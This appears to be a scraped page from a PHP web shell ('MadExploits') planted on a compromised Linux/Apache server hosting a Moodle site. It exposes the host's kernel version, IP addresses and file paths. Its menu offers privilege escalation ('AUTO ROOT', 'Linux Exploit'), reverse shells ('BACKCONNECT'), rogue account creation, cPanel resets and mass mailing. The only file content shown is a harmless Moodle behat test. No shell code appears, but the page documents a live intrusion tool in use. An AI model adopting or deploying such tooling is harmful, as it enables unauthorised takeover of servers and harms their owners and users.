Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.100.65
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
enrol /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
add_to_group.feature
1.53
KB
-rw-r--r--
behat_enrol.php
4.34
KB
-rw-r--r--
enrol_user.feature
1013
B
-rw-r--r--
role_visibility.feature
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add_to_group.feature
@core_enrol @core_group Feature: Users can be added to multiple groups at once In order to manage group membership effectively As a user I need to add another user to multiple groups Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "groups" exist: | name | course | idnumber | | Group 1 | C1 | G1 | | Group 2 | C1 | G2 | | Group 3 | C1 | G3 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | editingteacher | @javascript @skip_chrome_zerosize Scenario: Adding a user to multiple groups Given I log in as "teacher1" And I am on "Course 1" course homepage And I follow "Participants" And I click on "Edit groups for \"Student 1\"" "link" in the "student1" "table_row" And I click on ".form-autocomplete-downarrow" "css_element" in the "student1" "table_row" And I click on "Group 1" item in the autocomplete list And I click on ".form-autocomplete-downarrow" "css_element" in the "student1" "table_row" And I click on "Group 2" item in the autocomplete list And I press the escape key And I click on "Save changes" "link" in the "student1" "table_row" Then I should see "Group 1, Group 2"
Close